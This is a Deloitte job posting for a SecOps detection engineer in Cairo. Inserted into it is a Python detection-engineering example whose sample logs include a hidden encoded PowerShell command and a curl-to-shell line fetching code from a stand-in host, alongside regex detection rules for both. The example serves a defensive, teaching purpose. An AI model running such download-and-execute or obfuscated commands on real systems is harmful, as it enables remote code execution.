Deloitte Innovation Hub | Cyber Security | SecOps Detection Senior Engineer, Cairo, Egypt
Connect to your career at Deloitte
Deloitte, established globally in 1845, is the world’s largest and leading professional services firm, providing Audit & Assurance, Tax & Legal and Consulting and related services to public and private clients spanning multiple industries. Present in more than 150 countries, Deloitte is distinct in its ability to help clients solve their most complex problems, from strategy to implementation.
Deloitte Innovation Hub (DIH) is a strategic initiative/priority established by Deloitte North & South Europe (NSE) to support our ambition to become the leading business transformation partner of choice for our clients and to expand and scale our delivery footprint across EMEA. With access to a scaled, diverse, highly skilled, motivated, and engaged workforce, DIH is delivering complex technical solutions for clients’ most complex business problems, across Portfolios that include ‘Strategy & Transactions’, ‘Customer’, ‘Engineering, AI & Data’, ‘Enterprise, Technology & Performance’ and ‘Cyber’. DIH is aiming to become the destination for top talent in Egypt for a long, exciting career.
We invest in outstanding people of diverse talents and backgrounds and empower them to achieve more than they could elsewhere. Our work combines advice with action and integrity. We believe that when our clients and society are stronger, so are we. Our organization has grown in scale and diversity, providing services across the region, with our shared culture remaining the same. We aim to help clients realize their ambitions, make a positive difference in society, and maximize the success of our people. This drive fuels the commitment and humanity that run deep through our every action.
Connect to your opportunity
Responsible for configuring, maintaining, and supporting CSOC platforms, tools and logging infrastructure, ensuring all systems are fully operational and secure. Manage the development, customization and tuning of security content, including use cases, rules, and playbooks, to effectively detect and respond to cyber threats, ensuring detection logic and automation workflows align with CSOC priorities and cyber threat intelligence.
- Design and build CSOC technologies such as SIEM, SOAR, EDR, and other platforms.
- Design and develop security content for SIEM, SOAR and EDR.
- Configure and maintain SIEM, SOAR, EDR, and other CSOC platforms.
- Build and manage logging infrastructure to ensure full telemetry coverage.
- Manage log source onboarding, parsing, normalization, data ingestion pipelines, and enrichment activities.
- Develop, test, and fine-tune detection rules, correlation logic, and alert conditions.
- Map and report detection coverage against frameworks (e.g., MITRE ATT&CK).
- Propose new detection ideas based on threat research and attack simulations.
- Build SOAR playbooks and automation scripts for alert enrichment and incident response.
- Translate threat intelligence, red team findings, and vulnerability data into use cases.
- Perform false-positive analysis and rule optimization to improve fidelity.
- Maintain a content repository with versioning, documentation, and lifecycle status.
- Work with threat monitoring and DFIR teams to validate use case effectiveness.
- Maintain system documentation, configuration baselines, and maintenance records.
- Monitor health and availability of all logging pipelines and tools.
- Conduct root-cause analysis of tool outages or data loss.
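As an added example (not Deloitte's code and not part of the posting), the loop the responsibilities above describe, from log-source onboarding through normalization, rule evaluation, ATT&CK mapping and false-positive tuning, in one self-contained Python script. The log lines, hosts, users, paths and rule IDs are constructed for illustration; the rule logic is Sigma-style in spirit but written directly in Python rather than in Sigma YAML.

```python
"""
Detection-content pipeline in miniature: onboard raw log lines, normalize
them to one schema, evaluate rules, tag ATT&CK techniques, and tune out a
known false positive. Added illustration only, not Deloitte code; every
host, user, path and log line below is constructed.
"""
import json
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional

# --- 1. Log onboarding: constructed telemetry in two native formats ----------
_WIN_EVENTS = [  # Windows Security 4688 (process creation) as a SIEM receives it
    {"EventID": 4688, "Computer": "WS01.corp.local", "SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"EventID": 4688, "Computer": "SRV02.corp.local", "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -EncodedCommand ZwBlAHQALQBkAGEAdABlAA== -File C:\Backup\nightly.ps1"},
    {"EventID": 4624, "Computer": "WS01.corp.local", "SubjectUserName": "jdoe"},  # logon, out of scope
]
SAMPLE_LOGS = [json.dumps(e) for e in _WIN_EVENTS] + [
    # Linux auditd EXECVE record (key=value format) fed through the same pipeline
    'type=EXECVE host=lx01 uid=1000 exe="/bin/bash" a0="bash" a1="-c" a2="curl http://example.invalid/x | sh"',
]

# --- 2. Normalization: every source lands in the same schema -----------------
@dataclass
class Event:
    host: str
    user: str
    image: str          # full path of the executed binary
    command_line: str
    source: str

def normalize(line: str) -> Optional[Event]:
    """Parse one raw line into Event; None means 'not a process-creation record we model'."""
    line = line.strip()
    if line.startswith("{"):
        d = json.loads(line)
        if d.get("EventID") != 4688:
            return None
        return Event(d["Computer"], d["SubjectUserName"], d["NewProcessName"],
                     d["CommandLine"], "windows_security")
    if line.startswith("type=EXECVE"):
        kv = {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}
        argv = [kv[k] for k in sorted((k for k in kv if re.fullmatch(r"a\d+", k)),
                                      key=lambda k: int(k[1:]))]
        return Event(kv.get("host", "?"), kv.get("uid", "?"), kv.get("exe", "?"),
                     " ".join(argv), "linux_auditd")
    return None

# --- 3. Detection content: rule = logic + ATT&CK mapping + tuned exclusions ---
@dataclass
class Rule:
    rule_id: str
    title: str
    attack: List[str]                      # ATT&CK technique IDs, for coverage reporting
    match: Callable[[Event], bool]
    exclusions: List[Callable[[Event], bool]] = field(default_factory=list)

def _encoded_powershell(ev: Event) -> bool:
    # Covers -e / -ec / -enc / -EncodedCommand. powershell.exe also accepts other
    # unambiguous prefixes (-en, -enco, ...), which a production rule must add.
    return ev.image.lower().endswith("powershell.exe") and bool(
        re.search(r"(?i)\s-e(c|nc|ncodedcommand)?\s", ev.command_line))

def _curl_pipe_shell(ev: Event) -> bool:
    return bool(re.search(r"(?i)\bcurl\b[^|]*\|\s*(ba|z|da)?sh\b", ev.command_line))

RULES_UNTUNED = [
    Rule("DET-001", "Encoded PowerShell command line", ["T1059.001", "T1027"], _encoded_powershell),
    Rule("DET-002", "curl output piped to a shell", ["T1059.004", "T1105"], _curl_pipe_shell),
]

# After false-positive analysis: the backup account runs a known encoded wrapper nightly.
# The exclusion is narrow (account AND script), not "ignore svc_backup", to keep fidelity.
RULES_TUNED = [
    Rule("DET-001", "Encoded PowerShell command line", ["T1059.001", "T1027"], _encoded_powershell,
         exclusions=[lambda ev: ev.user == "svc_backup" and "nightly.ps1" in ev.command_line.lower()]),
    RULES_UNTUNED[1],
]

# --- 4. Evaluation and coverage reporting -------------------------------------
def evaluate(lines: List[str], rules: List[Rule]) -> List[Dict]:
    """Run every rule over every normalizable line; return enriched alerts."""
    alerts = []
    for line in lines:
        ev = normalize(line)
        if ev is None:
            continue
        for r in rules:
            if r.match(ev) and not any(ex(ev) for ex in r.exclusions):
                alerts.append({"rule": r.rule_id, "title": r.title, "attack": r.attack,
                               "host": ev.host, "user": ev.user, "source": ev.source,
                               "command_line": ev.command_line})
    return alerts

def coverage(rules: List[Rule]) -> Dict[str, List[str]]:
    """ATT&CK technique -> rules that claim it; the raw input for a coverage matrix."""
    cov: Dict[str, List[str]] = {}
    for r in rules:
        for tech in r.attack:
            cov.setdefault(tech, []).append(r.rule_id)
    return cov

if __name__ == "__main__":
    print(len(evaluate(SAMPLE_LOGS, RULES_UNTUNED)), "alerts before tuning")
    for a in evaluate(SAMPLE_LOGS, RULES_TUNED):
        print(a["rule"], a["attack"], a["host"], a["user"])
    print(coverage(RULES_TUNED))
```

Untuned, the two encoded-PowerShell events and the curl-to-shell event all fire (three alerts); after the scoped exclusion only the interactive encoded command on WS01 and the Linux download-and-execute remain. The exclusion is deliberately tied to both the account and the script path so that the same account running a different encoded command still alerts, which is the difference between tuning and blinding a rule. The coverage map is what a MITRE ATT&CK Navigator layer or coverage report would be generated from.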
Connect to your skills and professional experience
- Bachelor’s degree in Computer Engineering, Computer Science, Information Technology, or a related field.
- 3–6 years of experience in Cybersecurity Operations (CSOC), Detection Engineering, or Detection Content Development.
- Strong understanding of SOC architecture, security technologies, and log management, including ingestion, parsing, enrichment, correlation, and storage best practices.
- Hands-on experience with SIEM/SOAR platforms such as Splunk, ELK, LogRhythm, Microsoft Sentinel, Palo Alto XSIAM, or similar.
- Solid knowledge of network infrastructure, Linux/Windows administration, and system monitoring, with expertise in security telemetry (firewall, EDR, proxy, and other log sources).
- Proficiency in query languages and detection rule formats (e.g., KQL, SPL, Sigma) and in scripting for automation, detection tuning, and log source validation.
- Familiarity with SOAR automation and orchestration tools (e.g., Cortex XSOAR, Microsoft Sentinel playbooks built on Azure Logic Apps, or Splunk SOAR, formerly Phantom) and experience designing scalable, reusable detection content.
- In-depth understanding of threat detection concepts, attacker behaviors, and MITRE ATT&CK mapping, including content gap analysis and threat model alignment.
- Strong analytical and troubleshooting skills with the ability to ensure high availability and reliability of security tooling.
- Knowledge of AI/ML concepts and their application in cybersecurity for detection and automation use cases.
- Good communication and coordination skills, with the ability to collaborate effectively across teams such as Threat Monitoring, CTI, and DFIR.
- Strong documentation and version control discipline (e.g., Git, Confluence) and attention to detection accuracy and operational impact.
- Understanding of data integrity, retention policies, and relevant regulatory/compliance standards.
- Relevant certifications in SIEM/SOAR/EDR platforms (e.g., Splunk, ELK, LogRhythm, Microsoft Sentinel, Palo Alto XSIAM, or equivalent) are preferred.
Connect to your service line – Technology and Transformation
Distinctive thinking, deep expertise, and collaborative working. That’s what connects us. That’s what makes us Deloitte. If you want to help solve some of the biggest challenges around, join us. Together, we’ll make an impact that matters.
Personal independence
Regulation and controls are standard practice in our industry and Deloitte is no exception. These controls provide important legal protection for both you and the firm. We are subject to several audit regulations, one of which requires that certain colleagues abide by specific personal independence constraints. This can mean that you and your "Immediate Family Members" are not permitted to hold certain financial interests (shares, funds, bonds etc.) with audit clients of the firm. The recruitment team will provide further detail as you progress through the recruitment process.
Connect to your Industry
“What attracted me to Deloitte were the endless opportunities and the collective experience of other like-minded individuals. Deloitte’s clients include many of the world’s largest organizations; I wanted to be part of a team that made a difference that I could be proud of.” Dan, T&T.
Connect with your colleagues
Location: Cairo, Egypt
Your Work, Your Way: We call our hybrid working vision Deloitte Works. And it does. We trust you to make the right choices around where, when, and how you work. You’ll be able to make decisions about how you work best, to be collaborative, learn from colleagues, share your experiences, build the relationships that will fuel your career and prioritize your wellbeing. Having great conversations with your team and your leadership paves the way for great collaborative ways of working.
Our commitment to you
Making an impact is more than just what we do: it’s why we’re here. So we work hard to create an environment where you can experience a purpose you believe in, the freedom to be you, and the capacity to go further than ever before.
We want you. The true you. Your own strengths, perspective, and personality. So, we’re nurturing a culture where everyone belongs, feels supported and heard, and is empowered to make a valuable, personal contribution. You can be sure we’ll take your wellbeing seriously, too. Because it’s only when you’re comfortable and at your best that you can make the kind of impact you, and we, live for.
Your expertise is our capability, so we’ll make sure it never stops growing. Whether it’s from the complex work you do, or the people you collaborate with, you’ll learn every day. Through world-class development, you’ll gain invaluable technical and personal skills. Whatever your level, you’ll learn how to lead.
Connect to your next step!
A career at Deloitte is an opportunity to develop in any direction you choose. Join us and you’ll experience a purpose you can believe in and an impact you can see. You’ll be free to bring your true self to work every day. And you’ll never stop growing, whatever your level.